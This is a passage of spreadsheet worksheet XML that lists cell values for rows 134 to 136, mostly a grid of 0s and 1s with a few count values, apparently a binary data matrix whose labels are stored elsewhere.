      <c r="NS134">
        <v>0</v>
      </c>
      <c r="NT134">
        <v>0</v>
      </c>
      <c r="NU134">
        <v>0</v>
      </c>
      <c r="NV134">
        <v>0</v>
      </c>
      <c r="NW134">
        <v>0</v>
      </c>
      <c r="NX134">
        <v>0</v>
      </c>
      <c r="NY134">
        <v>0</v>
      </c>
      <c r="NZ134">
        <v>0</v>
      </c>
      <c r="OA134">
        <v>0</v>
      </c>
      <c r="OB134">
        <v>0</v>
      </c>
      <c r="OC134">
        <v>0</v>
      </c>
      <c r="OD134">
        <v>0</v>
      </c>
      <c r="OE134">
        <v>0</v>
      </c>
      <c r="OF134">
        <v>0</v>
      </c>
      <c r="OG134">
        <v>0</v>
      </c>
      <c r="OH134">
        <v>0</v>
      </c>
      <c r="OI134">
        <v>0</v>
      </c>
      <c r="OJ134">
        <v>0</v>
      </c>
      <c r="OK134">
        <v>0</v>
      </c>
      <c r="OL134">
        <v>0</v>
      </c>
      <c r="OM134">
        <v>0</v>
      </c>
      <c r="ON134">
        <v>0</v>
      </c>
      <c r="OO134">
        <v>0</v>
      </c>
      <c r="OP134">
        <v>0</v>
      </c>
      <c r="OQ134">
        <v>0</v>
      </c>
      <c r="OR134">
        <v>0</v>
      </c>
      <c r="OS134">
        <v>0</v>
      </c>
      <c r="OT134">
        <v>0</v>
      </c>
      <c r="OU134">
        <v>0</v>
      </c>
      <c r="OV134">
        <v>0</v>
      </c>
      <c r="OW134">
        <v>0</v>
      </c>
      <c r="OX134">
        <v>0</v>
      </c>
      <c r="OY134">
        <v>1</v>
      </c>
      <c r="OZ134">
        <v>0</v>
      </c>
      <c r="PA134">
        <v>0</v>
      </c>
      <c r="PB134">
        <v>0</v>
      </c>
      <c r="PC134">
        <v>0</v>
      </c>
      <c r="PD134">
        <v>0</v>
      </c>
      <c r="PE134">
        <v>0</v>
      </c>
      <c r="PF134">
        <v>0</v>
      </c>
      <c r="PG134">
        <v>0</v>
      </c>
      <c r="PH134">
        <v>0</v>
      </c>
      <c r="PI134">
        <v>0</v>
      </c>
      <c r="PJ134">
        <v>0</v>
      </c>
      <c r="PK134">
        <v>0</v>
      </c>
      <c r="PL134">
        <v>0</v>
      </c>
      <c r="PM134">
        <v>0</v>
      </c>
      <c r="PN134">
        <v>0</v>
      </c>
      <c r="PO134">
        <v>0</v>
      </c>
      <c r="PP134">
        <v>0</v>
      </c>
      <c r="PQ134">
        <v>0</v>
      </c>
      <c r="PR134">
        <v>0</v>
      </c>
      <c r="PS134">
        <v>0</v>
      </c>
      <c r="PT134">
        <v>0</v>
      </c>
      <c r="PU134">
        <v>0</v>
      </c>
      <c r="PV134">
        <v>0</v>
      </c>
      <c r="PW134">
        <v>0</v>
      </c>
      <c r="PX134">
        <v>0</v>
      </c>
      <c r="PY134">
        <v>0</v>
      </c>
      <c r="PZ134">
        <v>0</v>
      </c>
      <c r="QA134">
        <v>0</v>
      </c>
      <c r="QB134">
        <v>0</v>
      </c>
      <c r="QC134">
        <v>0</v>
      </c>
      <c r="QD134">
        <v>0</v>
      </c>
      <c r="QE134">
        <v>0</v>
      </c>
      <c r="QF134">
        <v>0</v>
      </c>
      <c r="QG134">
        <v>0</v>
      </c>
      <c r="QH134">
        <v>0</v>
      </c>
      <c r="QI134">
        <v>0</v>
      </c>
      <c r="QJ134">
        <v>0</v>
      </c>
      <c r="QK134">
        <v>0</v>
      </c>
      <c r="QL134">
        <v>0</v>
      </c>
      <c r="QM134">
        <v>0</v>
      </c>
      <c r="QN134">
        <v>0</v>
      </c>
      <c r="QO134">
        <v>0</v>
      </c>
      <c r="QP134">
        <v>0</v>
      </c>
      <c r="QQ134">
        <v>0</v>
      </c>
      <c r="QR134">
        <v>0</v>
      </c>
      <c r="QS134">
        <v>0</v>
      </c>
      <c r="QT134">
        <v>0</v>
      </c>
      <c r="QU134">
        <v>0</v>
      </c>
      <c r="QV134">
        <v>0</v>
      </c>
      <c r="QW134">
        <v>1</v>
      </c>
      <c r="QX134">
        <v>0</v>
      </c>
      <c r="QY134">
        <v>0</v>
      </c>
      <c r="QZ134">
        <v>0</v>
      </c>
      <c r="RA134">
        <v>0</v>
      </c>
      <c r="RB134">
        <v>0</v>
      </c>
      <c r="RC134">
        <v>0</v>
      </c>
      <c r="RD134">
        <v>0</v>
      </c>
      <c r="RE134">
        <v>0</v>
      </c>
      <c r="RF134">
        <v>0</v>
      </c>
      <c r="RG134">
        <v>0</v>
      </c>
      <c r="RH134">
        <v>0</v>
      </c>
      <c r="RI134">
        <v>0</v>
      </c>
      <c r="RJ134">
        <v>0</v>
      </c>
      <c r="RK134">
        <v>0</v>
      </c>
      <c r="RL134">
        <v>0</v>
      </c>
      <c r="RM134">
        <v>0</v>
      </c>
      <c r="RN134">
        <v>0</v>
      </c>
      <c r="RO134">
        <v>0</v>
      </c>
      <c r="RP134">
        <v>1</v>
      </c>
      <c r="RQ134">
        <v>0</v>
      </c>
      <c r="RR134">
        <v>1</v>
      </c>
      <c r="RS134">
        <v>0</v>
      </c>
      <c r="RT134">
        <v>0</v>
      </c>
      <c r="RU134">
        <v>0</v>
      </c>
      <c r="RV134">
        <v>0</v>
      </c>
      <c r="RW134">
        <v>0</v>
      </c>
      <c r="RX134">
        <v>0</v>
      </c>
      <c r="RY134">
        <v>0</v>
      </c>
      <c r="RZ134">
        <v>0</v>
      </c>
      <c r="SA134">
        <v>0</v>
      </c>
    </row>
    <row r="135" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A135" s="6" t="s">
        <v>4091</v>
      </c>
      <c r="B135">
        <v>42</v>
      </c>
      <c r="C135">
        <v>0</v>
      </c>
      <c r="D135">
        <v>0</v>
      </c>
      <c r="E135">
        <v>0</v>
      </c>
      <c r="F135">
        <v>0</v>
      </c>
      <c r="G135">
        <v>0</v>
      </c>
      <c r="H135">
        <v>0</v>
      </c>
      <c r="I135">
        <v>1</v>
      </c>
      <c r="J135">
        <v>0</v>
      </c>
      <c r="K135">
        <v>0</v>
      </c>
      <c r="L135">
        <v>0</v>
      </c>
      <c r="M135">
        <v>0</v>
      </c>
      <c r="N135">
        <v>0</v>
      </c>
      <c r="O135">
        <v>0</v>
      </c>
      <c r="P135">
        <v>0</v>
      </c>
      <c r="Q135">
        <v>0</v>
      </c>
      <c r="R135">
        <v>0</v>
      </c>
      <c r="S135">
        <v>0</v>
      </c>
      <c r="T135">
        <v>0</v>
      </c>
      <c r="U135">
        <v>0</v>
      </c>
      <c r="V135">
        <v>0</v>
      </c>
      <c r="W135">
        <v>0</v>
      </c>
      <c r="X135">
        <v>0</v>
      </c>
      <c r="Y135">
        <v>0</v>
      </c>
      <c r="Z135">
        <v>0</v>
      </c>
      <c r="AA135">
        <v>0</v>
      </c>
      <c r="AB135">
        <v>0</v>
      </c>
      <c r="AC135">
        <v>0</v>
      </c>
      <c r="AD135">
        <v>0</v>
      </c>
      <c r="AE135">
        <v>0</v>
      </c>
      <c r="AF135">
        <v>0</v>
      </c>
      <c r="AG135">
        <v>0</v>
      </c>
      <c r="AH135">
        <v>0</v>
      </c>
      <c r="AI135">
        <v>0</v>
      </c>
      <c r="AJ135">
        <v>0</v>
      </c>
      <c r="AK135">
        <v>0</v>
      </c>
      <c r="AL135">
        <v>0</v>
      </c>
      <c r="AM135">
        <v>0</v>
      </c>
      <c r="AN135">
        <v>0</v>
      </c>
      <c r="AO135">
        <v>1</v>
      </c>
      <c r="AP135">
        <v>0</v>
      </c>
      <c r="AQ135">
        <v>0</v>
      </c>
      <c r="AR135">
        <v>0</v>
      </c>
      <c r="AS135">
        <v>0</v>
      </c>
      <c r="AT135">
        <v>0</v>
      </c>
      <c r="AU135">
        <v>0</v>
      </c>
      <c r="AV135">
        <v>0</v>
      </c>
      <c r="AW135">
        <v>1</v>
      </c>
      <c r="AX135">
        <v>0</v>
      </c>
      <c r="AY135">
        <v>1</v>
      </c>
      <c r="AZ135">
        <v>0</v>
      </c>
      <c r="BA135">
        <v>0</v>
      </c>
      <c r="BB135">
        <v>0</v>
      </c>
      <c r="BC135">
        <v>0</v>
      </c>
      <c r="BD135">
        <v>0</v>
      </c>
      <c r="BE135">
        <v>0</v>
      </c>
      <c r="BF135">
        <v>0</v>
      </c>
      <c r="BG135">
        <v>0</v>
      </c>
      <c r="BH135">
        <v>0</v>
      </c>
      <c r="BI135">
        <v>0</v>
      </c>
      <c r="BJ135">
        <v>0</v>
      </c>
      <c r="BK135">
        <v>0</v>
      </c>
      <c r="BL135">
        <v>0</v>
      </c>
      <c r="BM135">
        <v>0</v>
      </c>
      <c r="BN135">
        <v>1</v>
      </c>
      <c r="BO135">
        <v>0</v>
      </c>
      <c r="BP135">
        <v>0</v>
      </c>
      <c r="BQ135">
        <v>0</v>
      </c>
      <c r="BR135">
        <v>0</v>
      </c>
      <c r="BS135">
        <v>1</v>
      </c>
      <c r="BT135">
        <v>0</v>
      </c>
      <c r="BU135">
        <v>0</v>
      </c>
      <c r="BV135">
        <v>0</v>
      </c>
      <c r="BW135">
        <v>0</v>
      </c>
      <c r="BX135">
        <v>1</v>
      </c>
      <c r="BY135">
        <v>0</v>
      </c>
      <c r="BZ135">
        <v>0</v>
      </c>
      <c r="CA135">
        <v>0</v>
      </c>
      <c r="CB135">
        <v>0</v>
      </c>
      <c r="CC135">
        <v>0</v>
      </c>
      <c r="CD135">
        <v>0</v>
      </c>
      <c r="CE135">
        <v>0</v>
      </c>
      <c r="CF135">
        <v>0</v>
      </c>
      <c r="CG135">
        <v>0</v>
      </c>
      <c r="CH135">
        <v>0</v>
      </c>
      <c r="CI135">
        <v>0</v>
      </c>
      <c r="CJ135">
        <v>0</v>
      </c>
      <c r="CK135">
        <v>0</v>
      </c>
      <c r="CL135">
        <v>0</v>
      </c>
      <c r="CM135">
        <v>0</v>
      </c>
      <c r="CN135">
        <v>0</v>
      </c>
      <c r="CO135">
        <v>0</v>
      </c>
      <c r="CP135">
        <v>1</v>
      </c>
      <c r="CQ135">
        <v>0</v>
      </c>
      <c r="CR135">
        <v>0</v>
      </c>
      <c r="CS135">
        <v>0</v>
      </c>
      <c r="CT135">
        <v>0</v>
      </c>
      <c r="CU135">
        <v>0</v>
      </c>
      <c r="CV135">
        <v>0</v>
      </c>
      <c r="CW135">
        <v>0</v>
      </c>
      <c r="CX135">
        <v>0</v>
      </c>
      <c r="CY135">
        <v>0</v>
      </c>
      <c r="CZ135">
        <v>0</v>
      </c>
      <c r="DA135">
        <v>0</v>
      </c>
      <c r="DB135">
        <v>0</v>
      </c>
      <c r="DC135">
        <v>0</v>
      </c>
      <c r="DD135">
        <v>0</v>
      </c>
      <c r="DE135">
        <v>0</v>
      </c>
      <c r="DF135">
        <v>0</v>
      </c>
      <c r="DG135">
        <v>0</v>
      </c>
      <c r="DH135">
        <v>0</v>
      </c>
      <c r="DI135">
        <v>0</v>
      </c>
      <c r="DJ135">
        <v>1</v>
      </c>
      <c r="DK135">
        <v>1</v>
      </c>
      <c r="DL135">
        <v>0</v>
      </c>
      <c r="DM135">
        <v>0</v>
      </c>
      <c r="DN135">
        <v>0</v>
      </c>
      <c r="DO135">
        <v>0</v>
      </c>
      <c r="DP135">
        <v>0</v>
      </c>
      <c r="DQ135">
        <v>0</v>
      </c>
      <c r="DR135">
        <v>0</v>
      </c>
      <c r="DS135">
        <v>0</v>
      </c>
      <c r="DT135">
        <v>0</v>
      </c>
      <c r="DU135">
        <v>0</v>
      </c>
      <c r="DV135">
        <v>0</v>
      </c>
      <c r="DW135">
        <v>0</v>
      </c>
      <c r="DX135">
        <v>0</v>
      </c>
      <c r="DY135">
        <v>0</v>
      </c>
      <c r="DZ135">
        <v>0</v>
      </c>
      <c r="EA135">
        <v>0</v>
      </c>
      <c r="EB135">
        <v>0</v>
      </c>
      <c r="EC135">
        <v>0</v>
      </c>
      <c r="ED135">
        <v>0</v>
      </c>
      <c r="EE135">
        <v>0</v>
      </c>
      <c r="EF135">
        <v>0</v>
      </c>
      <c r="EG135">
        <v>0</v>
      </c>
      <c r="EH135">
        <v>0</v>
      </c>
      <c r="EI135">
        <v>0</v>
      </c>
      <c r="EJ135">
        <v>0</v>
      </c>
      <c r="EK135">
        <v>0</v>
      </c>
      <c r="EL135">
        <v>0</v>
      </c>
      <c r="EM135">
        <v>0</v>
      </c>
      <c r="EN135">
        <v>0</v>
      </c>
      <c r="EO135">
        <v>0</v>
      </c>
      <c r="EP135">
        <v>0</v>
      </c>
      <c r="EQ135">
        <v>0</v>
      </c>
      <c r="ER135">
        <v>0</v>
      </c>
      <c r="ES135">
        <v>0</v>
      </c>
      <c r="ET135">
        <v>1</v>
      </c>
      <c r="EU135">
        <v>0</v>
      </c>
      <c r="EV135">
        <v>0</v>
      </c>
      <c r="EW135">
        <v>0</v>
      </c>
      <c r="EX135">
        <v>1</v>
      </c>
      <c r="EY135">
        <v>1</v>
      </c>
      <c r="EZ135">
        <v>0</v>
      </c>
      <c r="FA135">
        <v>0</v>
      </c>
      <c r="FB135">
        <v>0</v>
      </c>
      <c r="FC135">
        <v>1</v>
      </c>
      <c r="FD135">
        <v>0</v>
      </c>
      <c r="FE135">
        <v>0</v>
      </c>
      <c r="FF135">
        <v>0</v>
      </c>
      <c r="FG135">
        <v>0</v>
      </c>
      <c r="FH135">
        <v>0</v>
      </c>
      <c r="FI135">
        <v>1</v>
      </c>
      <c r="FJ135">
        <v>0</v>
      </c>
      <c r="FK135">
        <v>0</v>
      </c>
      <c r="FL135">
        <v>0</v>
      </c>
      <c r="FM135">
        <v>0</v>
      </c>
      <c r="FN135">
        <v>0</v>
      </c>
      <c r="FO135">
        <v>0</v>
      </c>
      <c r="FP135">
        <v>0</v>
      </c>
      <c r="FQ135">
        <v>0</v>
      </c>
      <c r="FR135">
        <v>0</v>
      </c>
      <c r="FS135">
        <v>0</v>
      </c>
      <c r="FT135">
        <v>0</v>
      </c>
      <c r="FU135">
        <v>0</v>
      </c>
      <c r="FV135">
        <v>1</v>
      </c>
      <c r="FW135">
        <v>0</v>
      </c>
      <c r="FX135">
        <v>0</v>
      </c>
      <c r="FY135">
        <v>0</v>
      </c>
      <c r="FZ135">
        <v>0</v>
      </c>
      <c r="GA135">
        <v>0</v>
      </c>
      <c r="GB135">
        <v>0</v>
      </c>
      <c r="GC135">
        <v>1</v>
      </c>
      <c r="GD135">
        <v>0</v>
      </c>
      <c r="GE135">
        <v>0</v>
      </c>
      <c r="GF135">
        <v>0</v>
      </c>
      <c r="GG135">
        <v>0</v>
      </c>
      <c r="GH135">
        <v>0</v>
      </c>
      <c r="GI135">
        <v>0</v>
      </c>
      <c r="GJ135">
        <v>0</v>
      </c>
      <c r="GK135">
        <v>0</v>
      </c>
      <c r="GL135">
        <v>1</v>
      </c>
      <c r="GM135">
        <v>0</v>
      </c>
      <c r="GN135">
        <v>0</v>
      </c>
      <c r="GO135">
        <v>0</v>
      </c>
      <c r="GP135">
        <v>0</v>
      </c>
      <c r="GQ135">
        <v>0</v>
      </c>
      <c r="GR135">
        <v>0</v>
      </c>
      <c r="GS135">
        <v>0</v>
      </c>
      <c r="GT135">
        <v>0</v>
      </c>
      <c r="GU135">
        <v>0</v>
      </c>
      <c r="GV135">
        <v>0</v>
      </c>
      <c r="GW135">
        <v>0</v>
      </c>
      <c r="GX135">
        <v>0</v>
      </c>
      <c r="GY135">
        <v>0</v>
      </c>
      <c r="GZ135">
        <v>0</v>
      </c>
      <c r="HA135">
        <v>0</v>
      </c>
      <c r="HB135">
        <v>0</v>
      </c>
      <c r="HC135">
        <v>0</v>
      </c>
      <c r="HD135">
        <v>0</v>
      </c>
      <c r="HE135">
        <v>0</v>
      </c>
      <c r="HF135">
        <v>0</v>
      </c>
      <c r="HG135">
        <v>0</v>
      </c>
      <c r="HH135">
        <v>0</v>
      </c>
      <c r="HI135">
        <v>0</v>
      </c>
      <c r="HJ135">
        <v>0</v>
      </c>
      <c r="HK135">
        <v>1</v>
      </c>
      <c r="HL135">
        <v>0</v>
      </c>
      <c r="HM135">
        <v>0</v>
      </c>
      <c r="HN135">
        <v>0</v>
      </c>
      <c r="HO135">
        <v>0</v>
      </c>
      <c r="HP135">
        <v>0</v>
      </c>
      <c r="HQ135">
        <v>0</v>
      </c>
      <c r="HR135">
        <v>0</v>
      </c>
      <c r="HS135">
        <v>0</v>
      </c>
      <c r="HT135">
        <v>0</v>
      </c>
      <c r="HU135">
        <v>0</v>
      </c>
      <c r="HV135">
        <v>0</v>
      </c>
      <c r="HW135">
        <v>0</v>
      </c>
      <c r="HX135">
        <v>0</v>
      </c>
      <c r="HY135">
        <v>1</v>
      </c>
      <c r="HZ135">
        <v>0</v>
      </c>
      <c r="IA135">
        <v>1</v>
      </c>
      <c r="IB135">
        <v>0</v>
      </c>
      <c r="IC135">
        <v>1</v>
      </c>
      <c r="ID135">
        <v>0</v>
      </c>
      <c r="IE135">
        <v>0</v>
      </c>
      <c r="IF135">
        <v>0</v>
      </c>
      <c r="IG135">
        <v>0</v>
      </c>
      <c r="IH135">
        <v>0</v>
      </c>
      <c r="II135">
        <v>0</v>
      </c>
      <c r="IJ135">
        <v>0</v>
      </c>
      <c r="IK135">
        <v>0</v>
      </c>
      <c r="IL135">
        <v>0</v>
      </c>
      <c r="IM135">
        <v>0</v>
      </c>
      <c r="IN135">
        <v>0</v>
      </c>
      <c r="IO135">
        <v>0</v>
      </c>
      <c r="IP135">
        <v>0</v>
      </c>
      <c r="IQ135">
        <v>0</v>
      </c>
      <c r="IR135">
        <v>0</v>
      </c>
      <c r="IS135">
        <v>0</v>
      </c>
      <c r="IT135">
        <v>0</v>
      </c>
      <c r="IU135">
        <v>0</v>
      </c>
      <c r="IV135">
        <v>0</v>
      </c>
      <c r="IW135">
        <v>0</v>
      </c>
      <c r="IX135">
        <v>1</v>
      </c>
      <c r="IY135">
        <v>1</v>
      </c>
      <c r="IZ135">
        <v>0</v>
      </c>
      <c r="JA135">
        <v>0</v>
      </c>
      <c r="JB135">
        <v>0</v>
      </c>
      <c r="JC135">
        <v>0</v>
      </c>
      <c r="JD135">
        <v>0</v>
      </c>
      <c r="JE135">
        <v>1</v>
      </c>
      <c r="JF135">
        <v>0</v>
      </c>
      <c r="JG135">
        <v>0</v>
      </c>
      <c r="JH135">
        <v>0</v>
      </c>
      <c r="JI135">
        <v>0</v>
      </c>
      <c r="JJ135">
        <v>0</v>
      </c>
      <c r="JK135">
        <v>0</v>
      </c>
      <c r="JL135">
        <v>0</v>
      </c>
      <c r="JM135">
        <v>0</v>
      </c>
      <c r="JN135">
        <v>0</v>
      </c>
      <c r="JO135">
        <v>0</v>
      </c>
      <c r="JP135">
        <v>0</v>
      </c>
      <c r="JQ135">
        <v>0</v>
      </c>
      <c r="JR135">
        <v>0</v>
      </c>
      <c r="JS135">
        <v>0</v>
      </c>
      <c r="JT135">
        <v>0</v>
      </c>
      <c r="JU135">
        <v>0</v>
      </c>
      <c r="JV135">
        <v>0</v>
      </c>
      <c r="JW135">
        <v>0</v>
      </c>
      <c r="JX135">
        <v>0</v>
      </c>
      <c r="JY135">
        <v>0</v>
      </c>
      <c r="JZ135">
        <v>0</v>
      </c>
      <c r="KA135">
        <v>0</v>
      </c>
      <c r="KB135">
        <v>0</v>
      </c>
      <c r="KC135">
        <v>0</v>
      </c>
      <c r="KD135">
        <v>0</v>
      </c>
      <c r="KE135">
        <v>1</v>
      </c>
      <c r="KF135">
        <v>0</v>
      </c>
      <c r="KG135">
        <v>0</v>
      </c>
      <c r="KH135">
        <v>0</v>
      </c>
      <c r="KI135">
        <v>0</v>
      </c>
      <c r="KJ135">
        <v>0</v>
      </c>
      <c r="KK135">
        <v>0</v>
      </c>
      <c r="KL135">
        <v>0</v>
      </c>
      <c r="KM135">
        <v>0</v>
      </c>
      <c r="KN135">
        <v>0</v>
      </c>
      <c r="KO135">
        <v>0</v>
      </c>
      <c r="KP135">
        <v>0</v>
      </c>
      <c r="KQ135">
        <v>0</v>
      </c>
      <c r="KR135">
        <v>0</v>
      </c>
      <c r="KS135">
        <v>0</v>
      </c>
      <c r="KT135">
        <v>0</v>
      </c>
      <c r="KU135">
        <v>0</v>
      </c>
      <c r="KV135">
        <v>0</v>
      </c>
      <c r="KW135">
        <v>0</v>
      </c>
      <c r="KX135">
        <v>0</v>
      </c>
      <c r="KY135">
        <v>0</v>
      </c>
      <c r="KZ135">
        <v>0</v>
      </c>
      <c r="LA135">
        <v>0</v>
      </c>
      <c r="LB135">
        <v>0</v>
      </c>
      <c r="LC135">
        <v>0</v>
      </c>
      <c r="LD135">
        <v>0</v>
      </c>
      <c r="LE135">
        <v>1</v>
      </c>
      <c r="LF135">
        <v>0</v>
      </c>
      <c r="LG135">
        <v>0</v>
      </c>
      <c r="LH135">
        <v>0</v>
      </c>
      <c r="LI135">
        <v>0</v>
      </c>
      <c r="LJ135">
        <v>0</v>
      </c>
      <c r="LK135">
        <v>1</v>
      </c>
      <c r="LL135">
        <v>0</v>
      </c>
      <c r="LM135">
        <v>0</v>
      </c>
      <c r="LN135">
        <v>0</v>
      </c>
      <c r="LO135">
        <v>0</v>
      </c>
      <c r="LP135">
        <v>0</v>
      </c>
      <c r="LQ135">
        <v>0</v>
      </c>
      <c r="LR135">
        <v>1</v>
      </c>
      <c r="LS135">
        <v>0</v>
      </c>
      <c r="LT135">
        <v>0</v>
      </c>
      <c r="LU135">
        <v>0</v>
      </c>
      <c r="LV135">
        <v>0</v>
      </c>
      <c r="LW135">
        <v>0</v>
      </c>
      <c r="LX135">
        <v>1</v>
      </c>
      <c r="LY135">
        <v>0</v>
      </c>
      <c r="LZ135">
        <v>0</v>
      </c>
      <c r="MA135">
        <v>0</v>
      </c>
      <c r="MB135">
        <v>0</v>
      </c>
      <c r="MC135">
        <v>0</v>
      </c>
      <c r="MD135">
        <v>0</v>
      </c>
      <c r="ME135">
        <v>0</v>
      </c>
      <c r="MF135">
        <v>0</v>
      </c>
      <c r="MG135">
        <v>0</v>
      </c>
      <c r="MH135">
        <v>0</v>
      </c>
      <c r="MI135">
        <v>0</v>
      </c>
      <c r="MJ135">
        <v>0</v>
      </c>
      <c r="MK135">
        <v>0</v>
      </c>
      <c r="ML135">
        <v>0</v>
      </c>
      <c r="MM135">
        <v>0</v>
      </c>
      <c r="MN135">
        <v>0</v>
      </c>
      <c r="MO135">
        <v>0</v>
      </c>
      <c r="MP135">
        <v>0</v>
      </c>
      <c r="MQ135">
        <v>1</v>
      </c>
      <c r="MR135">
        <v>0</v>
      </c>
      <c r="MS135">
        <v>0</v>
      </c>
      <c r="MT135">
        <v>0</v>
      </c>
      <c r="MU135">
        <v>1</v>
      </c>
      <c r="MV135">
        <v>1</v>
      </c>
      <c r="MW135">
        <v>0</v>
      </c>
      <c r="MX135">
        <v>0</v>
      </c>
      <c r="MY135">
        <v>0</v>
      </c>
      <c r="MZ135">
        <v>0</v>
      </c>
      <c r="NA135">
        <v>0</v>
      </c>
      <c r="NB135">
        <v>0</v>
      </c>
      <c r="NC135">
        <v>0</v>
      </c>
      <c r="ND135">
        <v>0</v>
      </c>
      <c r="NE135">
        <v>0</v>
      </c>
      <c r="NF135">
        <v>0</v>
      </c>
      <c r="NG135">
        <v>0</v>
      </c>
      <c r="NH135">
        <v>0</v>
      </c>
      <c r="NI135">
        <v>0</v>
      </c>
      <c r="NJ135">
        <v>0</v>
      </c>
      <c r="NK135">
        <v>1</v>
      </c>
      <c r="NL135">
        <v>0</v>
      </c>
      <c r="NM135">
        <v>0</v>
      </c>
      <c r="NN135">
        <v>0</v>
      </c>
      <c r="NO135">
        <v>0</v>
      </c>
      <c r="NP135">
        <v>0</v>
      </c>
      <c r="NQ135">
        <v>0</v>
      </c>
      <c r="NR135">
        <v>0</v>
      </c>
      <c r="NS135">
        <v>0</v>
      </c>
      <c r="NT135">
        <v>0</v>
      </c>
      <c r="NU135">
        <v>0</v>
      </c>
      <c r="NV135">
        <v>0</v>
      </c>
      <c r="NW135">
        <v>0</v>
      </c>
      <c r="NX135">
        <v>0</v>
      </c>
      <c r="NY135">
        <v>0</v>
      </c>
      <c r="NZ135">
        <v>0</v>
      </c>
      <c r="OA135">
        <v>0</v>
      </c>
      <c r="OB135">
        <v>1</v>
      </c>
      <c r="OC135">
        <v>0</v>
      </c>
      <c r="OD135">
        <v>0</v>
      </c>
      <c r="OE135">
        <v>0</v>
      </c>
      <c r="OF135">
        <v>0</v>
      </c>
      <c r="OG135">
        <v>0</v>
      </c>
      <c r="OH135">
        <v>1</v>
      </c>
      <c r="OI135">
        <v>0</v>
      </c>
      <c r="OJ135">
        <v>0</v>
      </c>
      <c r="OK135">
        <v>0</v>
      </c>
      <c r="OL135">
        <v>1</v>
      </c>
      <c r="OM135">
        <v>0</v>
      </c>
      <c r="ON135">
        <v>0</v>
      </c>
      <c r="OO135">
        <v>0</v>
      </c>
      <c r="OP135">
        <v>0</v>
      </c>
      <c r="OQ135">
        <v>0</v>
      </c>
      <c r="OR135">
        <v>0</v>
      </c>
      <c r="OS135">
        <v>0</v>
      </c>
      <c r="OT135">
        <v>0</v>
      </c>
      <c r="OU135">
        <v>0</v>
      </c>
      <c r="OV135">
        <v>0</v>
      </c>
      <c r="OW135">
        <v>0</v>
      </c>
      <c r="OX135">
        <v>0</v>
      </c>
      <c r="OY135">
        <v>0</v>
      </c>
      <c r="OZ135">
        <v>0</v>
      </c>
      <c r="PA135">
        <v>0</v>
      </c>
      <c r="PB135">
        <v>0</v>
      </c>
      <c r="PC135">
        <v>1</v>
      </c>
      <c r="PD135">
        <v>1</v>
      </c>
      <c r="PE135">
        <v>0</v>
      </c>
      <c r="PF135">
        <v>1</v>
      </c>
      <c r="PG135">
        <v>0</v>
      </c>
      <c r="PH135">
        <v>0</v>
      </c>
      <c r="PI135">
        <v>0</v>
      </c>
      <c r="PJ135">
        <v>0</v>
      </c>
      <c r="PK135">
        <v>0</v>
      </c>
      <c r="PL135">
        <v>0</v>
      </c>
      <c r="PM135">
        <v>0</v>
      </c>
      <c r="PN135">
        <v>0</v>
      </c>
      <c r="PO135">
        <v>0</v>
      </c>
      <c r="PP135">
        <v>1</v>
      </c>
      <c r="PQ135">
        <v>0</v>
      </c>
      <c r="PR135">
        <v>0</v>
      </c>
      <c r="PS135">
        <v>0</v>
      </c>
      <c r="PT135">
        <v>0</v>
      </c>
      <c r="PU135">
        <v>0</v>
      </c>
      <c r="PV135">
        <v>0</v>
      </c>
      <c r="PW135">
        <v>0</v>
      </c>
      <c r="PX135">
        <v>0</v>
      </c>
      <c r="PY135">
        <v>0</v>
      </c>
      <c r="PZ135">
        <v>0</v>
      </c>
      <c r="QA135">
        <v>0</v>
      </c>
      <c r="QB135">
        <v>0</v>
      </c>
      <c r="QC135">
        <v>0</v>
      </c>
      <c r="QD135">
        <v>0</v>
      </c>
      <c r="QE135">
        <v>0</v>
      </c>
      <c r="QF135">
        <v>0</v>
      </c>
      <c r="QG135">
        <v>0</v>
      </c>
      <c r="QH135">
        <v>0</v>
      </c>
      <c r="QI135">
        <v>0</v>
      </c>
      <c r="QJ135">
        <v>0</v>
      </c>
      <c r="QK135">
        <v>0</v>
      </c>
      <c r="QL135">
        <v>0</v>
      </c>
      <c r="QM135">
        <v>0</v>
      </c>
      <c r="QN135">
        <v>0</v>
      </c>
      <c r="QO135">
        <v>0</v>
      </c>
      <c r="QP135">
        <v>0</v>
      </c>
      <c r="QQ135">
        <v>0</v>
      </c>
      <c r="QR135">
        <v>0</v>
      </c>
      <c r="QS135">
        <v>0</v>
      </c>
      <c r="QT135">
        <v>0</v>
      </c>
      <c r="QU135">
        <v>0</v>
      </c>
      <c r="QV135">
        <v>0</v>
      </c>
      <c r="QW135">
        <v>1</v>
      </c>
      <c r="QX135">
        <v>0</v>
      </c>
      <c r="QY135">
        <v>0</v>
      </c>
      <c r="QZ135">
        <v>0</v>
      </c>
      <c r="RA135">
        <v>0</v>
      </c>
      <c r="RB135">
        <v>0</v>
      </c>
      <c r="RC135">
        <v>0</v>
      </c>
      <c r="RD135">
        <v>0</v>
      </c>
      <c r="RE135">
        <v>0</v>
      </c>
      <c r="RF135">
        <v>0</v>
      </c>
      <c r="RG135">
        <v>0</v>
      </c>
      <c r="RH135">
        <v>0</v>
      </c>
      <c r="RI135">
        <v>0</v>
      </c>
      <c r="RJ135">
        <v>0</v>
      </c>
      <c r="RK135">
        <v>0</v>
      </c>
      <c r="RL135">
        <v>0</v>
      </c>
      <c r="RM135">
        <v>0</v>
      </c>
      <c r="RN135">
        <v>0</v>
      </c>
      <c r="RO135">
        <v>0</v>
      </c>
      <c r="RP135">
        <v>0</v>
      </c>
      <c r="RQ135">
        <v>0</v>
      </c>
      <c r="RR135">
        <v>0</v>
      </c>
      <c r="RS135">
        <v>0</v>
      </c>
      <c r="RT135">
        <v>0</v>
      </c>
      <c r="RU135">
        <v>0</v>
      </c>
      <c r="RV135">
        <v>0</v>
      </c>
      <c r="RW135">
        <v>0</v>
      </c>
      <c r="RX135">
        <v>0</v>
      </c>
      <c r="RY135">
        <v>0</v>
      </c>
      <c r="RZ135">
        <v>0</v>
      </c>
      <c r="SA135">
        <v>0</v>
      </c>
    </row>
    <row r="136" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A136" s="6" t="s">
        <v>4107</v>
      </c>
      <c r="B136">
        <v>2</v>
      </c>
      <c r="C136">
        <v>0</v>
      </c>
      <c r="D136">
        <v>0</v>
      </c>
      <c r="E136">
        <v>0</v>
      </c>
      <c r="F136">
        <v>0</v>
      </c>
      <c r="G136">
        <v>0</v>
      </c>
      <c r="H136">
        <v>0</v>
      </c>
      <c r="I136">
        <v>0</v>
      </c>
      <c r="J136">
        <v>0</v>
      </c>
      <c r="K136">
        <v>0</v>
      </c>
      <c r="L136">
        <v>0</v>
      </c>
